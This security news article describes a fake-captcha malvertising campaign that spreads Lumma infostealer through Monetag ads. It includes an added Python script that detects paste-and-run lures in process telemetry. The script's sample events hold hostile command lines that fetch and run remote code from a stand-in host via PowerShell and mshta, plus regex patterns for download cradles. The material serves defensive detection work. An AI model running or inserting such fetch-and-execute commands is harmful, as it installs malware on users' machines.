Fake Captcha Campaign Highlights Risks of Malvertising Networks


A new large-scale campaign distributing Lumma infostealer malware through fake captcha pages has been observed using malvertising to exploit weaknesses in the digital advertising ecosystem. The attacks exposed thousands of victims to credential theft and financial losses.

Uncovered by Guardio Labs and Infoblox researchers, the campaign relies on Monetag, a subsidiary of PropellerAds, to propagate malicious fake captcha pages. Users encounter these deceptive pages while browsing legitimate-looking websites, where they are prompted to verify their identity by completing a captcha.

However, the "verification" steps do not verify anything: they lead the victim to run a PowerShell command on their own machine, which installs the infostealer. Lumma then harvests sensitive data such as social media credentials, banking information and personal files.
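The article says only that completing the fake captcha ends with a PowerShell command being executed. As an added example, not taken from the article or from Guardio Labs or Infoblox, the Python below shows how a detection engineer might hunt for that outcome in process-creation telemetry. It assumes the common fake-captcha pattern in which the victim is told to paste the command into the Windows Run dialog, so that explorer.exe becomes the parent of powershell.exe; the article does not state this, and the sample events, the domain lure.invalid and the indicator list are all constructed for the example.

```python
import ntpath
import re
from typing import Dict, List, Optional

# Process-creation records in the shape of Sysmon Event ID 1 (only the fields the
# rule uses). All five records are constructed for this example; none is telemetry
# from the campaign in the article.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # 0: assumed fake-captcha lineage (Run dialog -> explorer.exe parent) with a download cradle
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iwr http://lure.invalid/v.txt -UseBasicParsing | iex"',
    },
    {   # 1: legitimate admin session: interactive shell from a terminal, no cradle
        "ParentImage": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\wt.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoLogo",
    },
    {   # 2: mshta pulling a remote HTA, also launched from explorer.exe
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta http://lure.invalid/verify.hta",
    },
    {   # 3: scheduled-task PowerShell with a non-interactive parent and a local script
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
    },
    {   # 4: hidden, encoded PowerShell from cmd.exe: no Run-dialog lineage, but two indicators
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    },
]

# Script hosts worth inspecting when they are spawned by the desktop shell.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits typical of a paste-and-run lure (assumed indicator set, not from the article).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}


def evaluate(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for one process-creation event, or None if it is not suspicious."""
    image = ntpath.basename(event.get("Image", "")).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if image not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    # explorer.exe as parent is the assumed Run-dialog lineage: one indicator is enough there.
    # Elsewhere require two indicators to keep admin scripting out of the alert queue.
    if parent == "explorer.exe" and hits:
        severity = "high"
    elif len(hits) >= 2:
        severity = "medium"
    else:
        return None
    return {"severity": severity, "image": image, "parent": parent, "indicators": hits}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Evaluate every event and return findings tagged with the event's index."""
    findings = []
    for idx, event in enumerate(events):
        finding = evaluate(event)
        if finding:
            finding["index"] = idx
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] event {f['index']}: {f['parent']} -> {f['image']} ({', '.join(f['indicators'])})")
```

Run as a script it reports events 0 and 2 as high and event 4 as medium, while the terminal-launched shell and the scheduled task pass. In production the explorer.exe lineage check is the part that separates a paste-and-run lure from ordinary scripting, so it belongs in the rule even if the indicator regexes are swapped for a richer list.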

Key findings from the investigation include:

  • Extensive reach: Over 1 million ad impressions daily, with traffic funneled through more than 3,000 websites

  • Malware delivery mechanism: Redirect chains and obfuscated scripts distribute fake captcha pages via ad networks

  • Sophisticated cloaking: Attackers used services like BeMob for ad tracking to obscure malicious intent from moderators

The Role of Ad Networks

Guardio Labs highlighted how the infrastructure of ad networks enables such campaigns. Monetag’s ad scripts deploy traffic distribution systems (TDS) to analyze visitors and optimize ad placement. These systems, designed for legitimate advertising, are exploited to deliver malicious content on a massive scale.

Malvertising campaigns like this thrive due to fragmented accountability. Ad networks, tracking services, publishers and hosting providers each play roles but often avoid responsibility. Attackers further exploit these gaps by swapping benign creatives for malicious ones after approval.


“This fake captcha campaign is just one example that exposes the darker side of the internet’s advertising ecosystem,” Guardio Labs warned. “While advertising is a cornerstone of the modern internet, the same ecosystem now faces a significant conflict of interest – creating a security gap that leaves users vulnerable.”

Following the disclosure, Monetag and BeMob took action, banning over 200 accounts linked to the campaign. However, researchers emphasize the need for proactive measures, such as continuous content moderation and stricter account validation, to prevent abuse.
